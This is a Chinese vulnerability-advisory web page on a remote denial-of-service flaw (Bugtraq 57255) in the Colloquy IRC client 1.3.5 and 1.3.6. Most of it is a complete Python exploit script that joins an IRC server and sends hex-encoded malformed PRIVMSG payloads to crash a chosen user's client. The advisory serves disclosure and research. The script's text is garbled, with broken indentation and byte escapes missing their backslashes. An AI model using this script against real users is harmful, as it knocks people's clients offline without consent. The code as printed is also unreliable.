Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Colloquy远程拒绝服务漏洞

发布日期:2013-01-09
更新日期:2013-01-13受影响系统:
Colloquy Colloquy 1.3.6
 Colloquy Colloquy 1.3.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57255
 
Colloquy是高级的IRC、SILC & ICB客户端。
 
Colloquy 1.3.5、1.3.6在实现上存在远程拒绝服务漏洞,攻击者利用此漏洞可造成目标应用崩溃而拒绝服务。
 
<*来源:Aph3x
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
###################################################################################
 #                          #                   #
 #                          #    H O W - T O      #
 #                          #                   #
 #                          #######################
 #
 # Provide the Target: Server, Port, Nickname and the script will deliver
 # the payload...
 #
 # [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
 #
 ###################################################################################
 from argparse import ArgumentParser
 from time import sleep
 import socket
 shellcode = {
 # One Shot <3
 "one_shot"  : [
       "687474703a2f2f782f2e2425235e26402426402426232424242425232426",
       "23242623262340262a232a235e28242923404040245e2340242625232323",
       "5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
       "2e24" ],
 
  # 1.3.5
  "1_3_5"    : [
       "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
       "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
       "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
       "7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
 
  # 1.3.6 - ( Requires Sending 25 Times )
 "1_3_6"    : [
       "687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
       "292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
       "74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
       "7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
 }
 
def own( sock, target, sc_key="one_shot" ):
 sc = "".join( shellcode[sc_key] )
 targ = "".join( "".join( [ hex( ord( ch ) ) for ch in target ] ).split( "0x" ) )
 
  msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
 
  if sc_key not in "1_3_6":
   sock.send( bytes.fromhex( msg ) )
 else:
   try:
     for x in range( 1, 26 ):
       sock.send( bytes.fromhex( msg ) )
       sleep( .64 )
   except:
     print( "FAILED!")
 def connect( uri, port, target, sc_key ):
 sock = socket.socket()
 try:
   ret = sock.connect_ex(( uri, int( port ) ))
   sock.recv(8096)
 except:
   print( " [-] Failed To Connect To {}".format( uri ) )
   exit()
   sock.send( b"x4ex49x43x4bx20x7ax65x6dx70x30x64x61x79x0dx0a" )
  sock.send( b"x55x53x45x52x20x7ax65x6dx70x30x64x61x79x20x48x45x48x45x20x48x45x48x45x20x3ax3cx33x0dx0a" )
 
  while True:
   host_data = str( sock.recv( 8096 ).strip() )
     if " 396 " in host_data:
     print( " [+] Connection Successful Sending Payload To {}".format( target ) )
     own( sock, target, sc_key )
     sock.send( b"QUIT " )
     sock.close()
     break
     try:
      msg = host_data.split()
     if msg[0].lower() is "ping":
       sock.send( b"PONG {} ".format( msg[1] ) )
       continue
   except:
     pass
   print( " [!] Payload Sent, Target Should Drop Shortly <3" )
 
if __name__ == "__main__":
 parser = ArgumentParser( description="#legion Colloquy IRC DoS; Requires At Least A Nick To Target" )
 
  parser.add_argument( "-t", "--target", dest="target", default="localhost", help="IRCD Server Uri To Connect On" )
 parser.add_argument( "-p", "--port", dest="port", default=6667, help="Port To Connect On" )
 parser.add_argument( "-n", "--nick", dest="nick", metavar="NICK", help="Nick To Target" )
 
  parser.add_argument( "-s", "--shellcode", dest="shellcode", default="one_shot",
       help="Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )" )
 
  args = parser.parse_args()
 
  if args.nick is None:
   parser.print_help()
   exit()
 
  connect( args.target, args.port, args.nick, args.shellcode.strip() )建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Colloquy
 --------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://colloquy.info/Samsung Kies PrepareSync()远程缓冲区溢出漏洞Nero MediaHome "NMMediaServer.dll"多个拒绝服务漏洞相关资讯      Colloquy安全漏洞  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款